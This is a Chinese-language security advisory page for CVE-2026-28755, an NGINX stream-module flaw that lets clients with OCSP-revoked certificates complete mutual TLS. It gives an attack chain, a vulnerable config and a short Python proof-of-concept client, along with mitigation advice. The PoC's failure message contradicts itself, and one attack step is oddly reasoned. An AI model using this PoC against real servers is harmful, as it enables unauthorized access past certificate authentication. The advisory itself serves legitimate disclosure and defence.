CVE-2026-28755 CVSS 5.4 中危

CVE-2026-28755 NGINX SSL证书验证绕过漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-28755

漏洞类型

证书验证绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

NGINX Plus, NGINX Open Source

漏洞概述

NGINX Plus和NGINX Open Source的ngx_stream_ssl_module模块存在漏洞。当配置了ssl_verify_client on和ssl_ocsp on指令时，系统未能正确处理已吊销证书。尽管OCSP检查已识别出证书状态为已撤销，但TLS握手仍被允许成功完成。该漏洞可能导致持有失效证书的攻击者绕过身份验证，建立未授权的加密连接，对系统机密性和完整性构成威胁。

技术细节

该漏洞核心在于NGINX的ngx_stream_ssl_module对OCSP（在线证书状态协议）响应处理的逻辑缺陷。在标准双向TLS认证流程中，服务端配置ssl_verify_client on强制要求验证客户端证书，ssl_ocsp on则启用实时吊销检查。正常情况下，若OCSP响应显示证书已撤销，握手应立即中止。但在受影响版本中，模块未能正确解析或处理该错误状态，导致握手异常继续。攻击者利用此漏洞，可持有已被CA吊销的证书成功建立TLS连接，从而绕过基于证书的身份验证机制。这不仅破坏了PKI体系的信任模型，还可能导致未授权用户获取敏感数据或执行受限操作。由于CVSS评分显示完整性影响为低，该利用主要绕过验证而非直接篡改数据，但风险依然显著。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标使用NGINX服务，并开启了双向认证（ssl_verify_client on）及OCSP检查（ssl_ocsp on）。

STEP 2

2. 证书获取

攻击者获取一个由目标信任的CA签发的有效客户端证书，并诱使或利用该CA吊销该证书。

STEP 3

3. 发起握手

攻击者使用已吊销的证书向目标NGINX服务器发起TLS连接请求。

STEP 4

4. OCSP响应绕过

服务器查询OCSP服务器，收到证书已吊销的响应，但由于ngx_stream_ssl_module的漏洞，未终止连接。

STEP 5

5. 建立连接

TLS握手成功完成，攻击者成功绕过身份验证，建立未授权的加密通道。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Nginx Vulnerable Configuration Example
stream {
    server {
        listen 1337 ssl;
        ssl_certificate     /etc/nginx/certs/server.crt;
        ssl_certificate_key /etc/nginx/certs/server.key;
        
        ssl_verify_client on;
        ssl_ocsp on;
        ssl_client_certificate /etc/nginx/certs/ca.crt;
        
        # Vulnerability: Handshake succeeds even if OCSP returns REVOKED
    }
}

# PoC Test Logic (Python)
import socket
import ssl

# Attacker holds a certificate that has been REVOKED by the CA
context = ssl.create_default_context()
context.load_cert_chain(certfile="revoked_client.crt", keyfile="revoked_client.key")
context.check_hostname = False

try:
    with socket.create_connection(("target_ip", 1337)) as sock:
        with context.wrap_socket(sock, server_hostname="target") as ssock:
            print("[+] Connection Established!")
            print("[+] Vulnerability Exploited: Server accepted a revoked certificate.")
except ssl.SSLCertVerificationError:
    print("[-] Connection Failed: Certificate verification succeeded (expected behavior).")
except Exception as e:
    print(f"Error: {e}")

影响范围

NGINX Plus (具体版本参考官方公告)

NGINX Open Source (具体版本参考官方公告)

防御指南

临时缓解措施

建议立即关注官方补丁发布并进行升级。在未修复前，如果业务允许，可暂时禁用ssl_ocsp on（依赖CRL或其他手段）或严格限制访问来源IP以降低风险，但这可能会影响客户端体验或导致其他兼容性问题。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-28755
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-28755
3 Details https://www.cvedetails.com/cve/CVE-2026-28755/
4 VulDB https://vuldb.com/cve/CVE-2026-28755
5 Link https://my.f5.com/manage/s/article/K000160368

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表